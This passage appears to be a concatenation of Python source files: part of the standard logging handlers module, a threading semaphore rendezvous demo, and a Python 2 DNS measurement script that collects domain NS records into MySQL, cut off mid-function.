"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
self.socket = None
self.createSocket()
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def createSocket(self):
address = self.address
socktype = self.socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it not worse
# to ignore it also here.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.socket
if sock:
self.socket = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if not self.socket:
self.createSocket()
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def getConnection(self, host, secure):
"""
get a HTTP[S]Connection.
Override when a custom connection is required, for example if
there is a proxy.
"""
import http.client
if secure:
connection = http.client.HTTPSConnection(host, context=self.context)
else:
connection = http.client.HTTPConnection(host)
return connection
def emit(self, record):
"""
Emit a record.
Send the record to the web server as a percent-encoded dictionary
"""
try:
import urllib.parse
host = self.host
h = self.getConnection(host, self.secure)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.acquire()
try:
self.target = target
finally:
self.release()
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepare a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message and
arguments, and removes unpickleable items from the record in-place.
Specifically, it overwrites the record's `msg` and
`message` attributes with the merged message (obtained by
calling the handler's `format` method), and sets the `args`,
`exc_info` and `exc_text` attributes to None.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
rendezvous.py
|
import threading
#global N
N = 5
count = 0
guard = threading.Semaphore(1)
turnstile1 = threading.Semaphore(0)
turnstile2 = threading.Semaphore(1)
def rendezvous():
'''Guard only allows one thread to increment count at a time
First N-1 threads to hit ready.acquire() become locked. The Nth thread
unlocks one thread which immediately unlocks another, successively letting all pass'''
global count
for i in range(5):
#print('Round {}'.format(i))
#time.sleep(.1)
guard.acquire()
count += 1
if count ==1:
print('{} string is ready'.format(count))
else:
print('{} strings are ready'.format(count))
if count == N:
turnstile2.acquire()
turnstile1.release()
guard.release()
turnstile1.acquire()
turnstile1.release()
'''Counts the number of threads through and shuts guard after desired N are through'''
#Here is where timing-sensitive code would go
guard.acquire()
count -=1
if N-count ==1:
print('{} string through'.format(N-count))
else:
print('{} strings through'.format(N-count))
if count == 0:
turnstile1.acquire()
print('No more shall pass this round')
print('')
turnstile2.release()
guard.release()
turnstile2.acquire()
turnstile2.release()
thread1 = threading.Thread(target = rendezvous)
thread2 = threading.Thread(target = rendezvous)
thread3 = threading.Thread(target = rendezvous)
thread4 = threading.Thread(target = rendezvous)
thread5 = threading.Thread(target = rendezvous)
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
|
obtaining_domain_ns_realtime.py
|
# encoding:utf-8
"""
分别向顶级域名的权威和DNS递归服务器查询域名的NS记录,并且批量更新
注意:使用两种方法获取域名的NS记录,因为不同方法都无法获取完整的NS记录
"""
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('../')
import threading
import time
import random
import datetime
import hashlib
from Queue import Queue
from threading import Thread
from collections import defaultdict
from resolving_domain_ns_by_tld import get_domain_ns_hierarchical_dns # 获取域名dns
from db_manage.data_base import MySQL
from db_manage.mysql_config import SOURCE_CONFIG_LOCAL as SOURCE_CONFIG
import tldextract
from resolving_domain_ns_by_ns import query_domain_ns_by_ns # 获取域名dns
from resolving_ip_cname_by_ns import query_ip_cname_by_ns
from Logger import Logger
from task_confirm import TaskConfirm
domain_ns_result = {} # 存储最终的ns结果
retry_domains = [] # 存储需要进行二次探测的域名及其主域名
thread_num = 50 # 主线程数量
retry_thread_num = 30 # 次级线程数量
queue = Queue() # 任务队列
logger = Logger(file_path='./query_log/',show_terminal=True) # 日志配置
class NSubThread(threading.Thread):
"""自定义线程类,用于返回结果"""
def __init__(self,func,args=()):
super(NSubThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result # 如果子线程不使用join方法,此处可能会报没有self.result的错误
except Exception,e:
logger.logger.error('获取线程的结果失败:',str(e))
return [], 'FALSE'
def read_domains(file_name):
"""
读取域名存储文件,获取要探测的域名,以及提取出主域名
注意:若是不符合规范的域名,则丢弃
"""
domains = []
main_domains = []
no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)
file_name = './unverified_domain_data/'+file_name
with open(file_name,'r') as fp:
for d in fp.readlines():
domain_tld = no_fetch_extract(d.strip())
tld, reg_domain = domain_tld.suffix, domain_tld.domain # 提取出顶级域名和主域名部分
if tld and reg_domain:
main_domains.append(reg_domain+'.'+tld)
domains.append(d.strip())
else:
logger.logger.warning('域名%s不符合规范,不进行探测' % d.strip())
return domains, main_domains
def insert_domains_db(domains):
"""将域名插入到数据库中"""
try:
db = MySQL(SOURCE_CONFIG)
except Exception,e:
logger.logger.error(e)
return False
for domain in domains:
sql = 'insert ignore into focused_domain (domain) values ("%s")' % (domain)
db.insert_no_commit(sql)
db.commit()
db.close()
return True
def extract_domain_tld(domain):
"""
提取域名的顶级域名
注意:不符合规范的域名,返回为空
"""
no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)
domain_tld = no_fetch_extract(domain)
tld = domain_tld.suffix
if '.' in tld: # 若是多级顶级域名,则返回最后1级
return tld.split('.')[-1]
else:
return tld
def fetch_tld_ns():
"""
获取顶级域名的权威服务器(ns)IP地址
"""
tld_ns = defaultdict(set)
try:
db = MySQL(SOURCE_CONFIG)
sql = 'SELECT tld,server_ipv4 from tld_ns_zone'
db.query(sql)
tld_ns_query = db.fetch_all_rows() # 获取已存储的顶级域名的权威服务器信息
except Exception, e:
logger.logger.error("获取顶级域名异常:",e)
return tld_ns
db.close()
for i in tld_ns_query:
tld = str(i['tld'])
if i['server_ipv4']:
ipv4 = str(i['server_ipv4']).split(';')
for ip in ipv4:
for p in ip.split(','):
if p:
tld_ns[tld].add(p)
return tld_ns
def update_domain_ns_db(id):
"""添加获取域名的DNS数据"""
# 解析关键字段信息
global domain_ns_result
ns_result = []
try:
db = MySQL(SOURCE_CONFIG)
except:
logger.logger.error("数据库连接失败")
return
for domain in domain_ns_result:
v = domain_ns_result[domain]
domain_ns = ','.join(v[0])
ns_md5 = hashlib.md5(domain_ns).hexdigest()
tld_ns = ','.join(v[1])
ns_ns = ','.join(v[2])
invalid_ns = ','.join(v[3])
unknown_ns = ','.join(v[4])
verify_strategy = v[5]
insert_time = v[6]
ns_result.append((domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,id))
ns_sql = 'INSERT INTO domain_valid_ns (domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,task_id) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \
ON DUPLICATE KEY UPDATE ns_md5 = VALUES (ns_md5),domain_ns=VALUES(domain_ns),tld_ns=VALUES (tld_ns),ns_ns = VALUES (ns_ns),invalid_ns=VALUES (invalid_ns), \
unknown_ns=VALUES (unknown_ns), verify_strategy=VALUES (verify_strategy),insert_time = VALUES (insert_time),task_id = VALUES (task_id)' # 存在则更新,不存在则插入
try:
db.update_many(ns_sql, ns_result)
except Exception as e:
logger.logger.error("更新域名的NS记录失败:" + str(e))
db.close()
def create_queue(domains, main_domains):
"""
创建首次探测的任务队列
"""
for i, d in enumerate(domains):
queue.put((d,main_domains[i]))
def create_retry_queue(retry_domains):
"""
创建二次探测的任务队列
"""
for domain,main_domain in retry_domains:
queue.put((domain,main_domain))
def obtain_domain_ns_by_tld(domain, tld_ns):
"""
向顶级域名权威服务器请求域名的NS记录,采用子线程方式,加快探测效率
:param
domain: string,要解析的域名
tld_ns: dict,顶级域名权威服务器的IP地址集合
:return
domain_ns: 域名的权威服务器名称集合
is_retry: true/false, true表示该域名要再次进行探测,false则不需要
"""
is_retry = True # 是否重新获取, 有顶级域名返回ns,或者是域名不存在,都不重新获取
status = []
tld = extract_domain_tld(domain) # 获取要查询域名tld
if not tld:
logger.logger.warning("不存在该域名:%s的顶级域名" % domain)
return []
tld_ns_set = tld_ns.get(tld) # 顶级域名的权威服务器IP地址
if not tld_ns_set:
logger.logger.warning("不存在该顶级域名:%s的权威服务器" % tld)
return []
sub_thread = [] # 线程列表
domain_ns = []
for ip in tld_ns_set:
t = NSubThread(get_domain_ns_hierarchical_dns, args=(domain, True, ip)) # 根据顶级域名权威数量,生成对应的子线程
sub_thread.append(t)
t.start()
for t in sub_thread:
t.join()
ns, ns_status = t.get_result()
status.append(ns_status)
if ns_status == 'TRUE':
domain_ns.extend(ns[1])
is_retry = False # 若域名存在有效的ns,则不需要再次探测
elif ns_status == 'NOEXSIT': # 若域名不存在,也不需要再次探测
is_retry = False
return list(set(domain_ns)), is_retry
def obtaining_domain_ns_by_ns(domain,main_domain, tld_domain_ns):
"""
向域名的权威服务器请求ns,获取域名权威服务器上的的ns记录集合
:param string domain: 要解析的原始域名
:param string main_domain: 主域名
:param list tld_domain_ns: tld解析的域名的ns权威服务器地址名称集合
:return list domain_ns: 经过验证后的有效域名ns地址集合
"""
domain_ns = [] # 验证后的有效域名ns集合
sub_thread = [] # 子线程集合
tld_domain_valid_ns = [] # 顶级域名权威服务器解析的域名ns结果
tld_domain_valid_ns_dict = {} # 记录各个响应的内容结果
tld_domain_invalid_ns = [] # 顶级域名权威服务器解析的域名ns结果
ns_domain_invalid_ns = []
ns_domain_ns = [] # 域名权威服务器解析的域名ns结果
unknown_ns = [] # 未确定的ns
# 创建子线程
for n in tld_domain_ns:
t = NSubThread(query_domain_ns_by_ns, args=(main_domain, n))
sub_thread.append(t)
t.setDaemon(True)
t.start()
# 获取域名权威服务器上的ns记录
for t in sub_thread:
t.join()
ns, ns_status, original_ns = t.get_result()
if ns_status == 'TRUE':
ns_domain_ns.extend(ns)
tld_domain_valid_ns.append(original_ns)
tld_domain_valid_ns_dict[original_ns] = ns
else:
tld_domain_invalid_ns.append(original_ns)
ns_domain_ns = list(set(ns_domain_ns)) # 去重
if not tld_domain_valid_ns: # 若无ns,则返回空,停止
verify_strategy = 1
is_retry = True
return domain_ns,tld_domain_ns,ns_domain_ns,list(set(ns_domain_invalid_ns+tld_domain_invalid_ns)),unknown_ns, verify_strategy, is_retry # 无有效的tld_ns,所以重新探测
ns_domain_del_ns = list(set(ns_domain_ns)-set(tld_domain_invalid_ns)) # 去除域名权威返回的ns中不可以正常解析的地址名称
is_same = set(tld_domain_valid_ns) == set(ns_domain_del_ns) # 判断有效两级的有效ns是否相同
# 相同,则直接返回正确的地址
if is_same:
domain_ns = tld_domain_valid_ns # 域名有效的ns
verify_strategy = 2
is_retry = False
return domain_ns, tld_domain_ns, ns_domain_ns, list(
set(ns_domain_invalid_ns + tld_domain_invalid_ns)), unknown_ns, verify_strategy, is_retry
# 不同,进一步分析处理
intersection_ns = set(tld_domain_valid_ns).intersection(set(ns_domain_del_ns)) # 上下级ns的交集
# print intersection_ns
if intersection_ns: # 交集不为空
is_retry = False
domain_ns.extend(intersection_ns) # 首先,交集ns为部分有效ns
verify_strategy = 3
# 对于只存在则域名ns的记录进行判断
only_ns = list(set(ns_domain_ns).difference(intersection_ns))
for n in only_ns:
ns, ns_status, _ = query_domain_ns_by_ns(main_domain, n) # 向域名的权威ns请求域名的ns
if ns_status == 'TRUE': # 可正常解析
if set(ns).intersection(set(domain_ns)): # 若与公共ns有交集,则判断为有效ns
domain_ns.append(n)
else:
flag = verify_ns_by_ip(domain,n,domain_ns)
if flag == 1:
domain_ns.append(n)
elif flag == 0:
ns_domain_invalid_ns.append(n)
else:
unknown_ns.append(n)
else: # 无法正常解析,则为无效ns
ns_domain_invalid_ns.append(n)
# 对于只存在在顶级域名权威的ns记录判断
only_tld = list(set(tld_domain_valid_ns).difference(intersection_ns))
for n in only_tld:
ns = tld_domain_valid_ns_dict.get(n)
